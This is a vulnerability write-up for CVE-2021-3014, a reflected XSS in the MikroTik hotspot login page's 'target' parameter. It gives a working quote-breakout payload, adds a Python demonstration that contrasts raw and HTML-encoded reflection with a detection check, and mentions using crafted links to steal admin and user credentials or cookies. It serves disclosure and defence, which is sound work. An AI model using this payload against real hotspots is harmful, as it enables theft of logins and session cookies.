Author Mohammed Al-Barbari aka @m4dm0e

CVE-ID: CVE-2021-3014

Summary: Reflected XSS in the MikroTik hotspot login page, via the target parameter.


Description: The hotspot login page contains a hidden input named target with an empty value. Whatever is supplied in a target query parameter is reflected, unchanged, into that input's value attribute in the page source, e.g.: c.net/login?target=HelloAll

Page source:

<input type="text" name="target" value="HelloAll" />

There is no output encoding on the reflected value, so a double quote closes the value attribute and everything after it is parsed as new attributes on the input tag, e.g.: ?target=hhh" onSubmit="alert(0)

Page source:

<input type="text" name="target" value="hhh" onSubmit="alert(0)" />

When the victim clicks the submit button, the XSS fires.
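The following is an added example and not MikroTik's code: a constructed stand-in for a login form that reflects the target parameter into value="..." the way the page above does (raw), next to the hardened form that HTML-attribute-encodes it, plus a parser-based check that reports whether the parameter escaped the attribute. It goes slightly beyond the writeup by showing the fix and the check, not just the breakout. The FORM template and the host c.net are assumptions for illustration.

```python
"""Attribute-context reflected XSS, as in the target parameter above.

Added example (not MikroTik's code): a minimal stand-in for a login
template that reflects ?target= into <input value="..."> both the
vulnerable way (raw) and the hardened way (HTML-attribute-encoded), plus
a parser-based check that tells the two apart.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the hotspot login form; this is NOT the real
# RouterOS login.html template, only enough markup to show the bug.
FORM = ('<form name="login" method="post" action="/login">'
        '<input type="text" name="target" value="{target}" />'
        '<input type="submit" value="OK" /></form>')


def _target_param(url: str) -> str:
    """Pull the (percent-decoded) target query parameter out of a URL."""
    return parse_qs(urlsplit(url).query).get("target", [""])[0]


def render_vulnerable(url: str) -> str:
    """Reflect ?target= into the value attribute with no encoding at all."""
    return FORM.format(target=_target_param(url))


def render_fixed(url: str) -> str:
    """Same reflection, but with ", ', <, > and & encoded (quote=True),
    so a double quote can no longer terminate the attribute."""
    return FORM.format(target=escape(_target_param(url), quote=True))


class _TargetInput(HTMLParser):
    """Collect the attributes a browser would see on the name="target" input."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        found = dict(attrs)
        if tag == "input" and found.get("name") == "target":
            self.attrs = found


def target_attrs(page: str) -> dict:
    """Attributes of the target input as parsed (entities decoded)."""
    parser = _TargetInput()
    parser.feed(page)
    return parser.attrs


def injected_handlers(page: str) -> list:
    """Event-handler attributes that ended up on the target input.
    Any hit means the parameter escaped the value attribute; the list is
    empty when the value stayed inside the quotes."""
    return sorted(k for k in target_attrs(page) if k.startswith("on"))


if __name__ == "__main__":
    # The writeup's payload, percent-encoded as a browser would send it.
    url = "http://c.net/login?target=hhh%22%20onSubmit%3D%22alert(0)"
    print(render_vulnerable(url))
    print("vulnerable:", injected_handlers(render_vulnerable(url)))
    print(render_fixed(url))
    print("fixed:     ", injected_handlers(render_fixed(url)))
```

In the vulnerable rendering the parser sees a separate onsubmit attribute on the input, while in the fixed rendering the whole payload, quote included, is the value of the single value attribute. The same check can be pointed at a page fetched from a real hotspot by feeding the response body to injected_handlers.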


How to exploit this? You have to be on the same network as the hotspot; from there a crafted login link lets you go after the admin's username and password or cookies, and those of the hotspot's users, using the usual XSS techniques.

PoC: A PoC video will be shared as soon as possible on my channel, GrodRiket Security.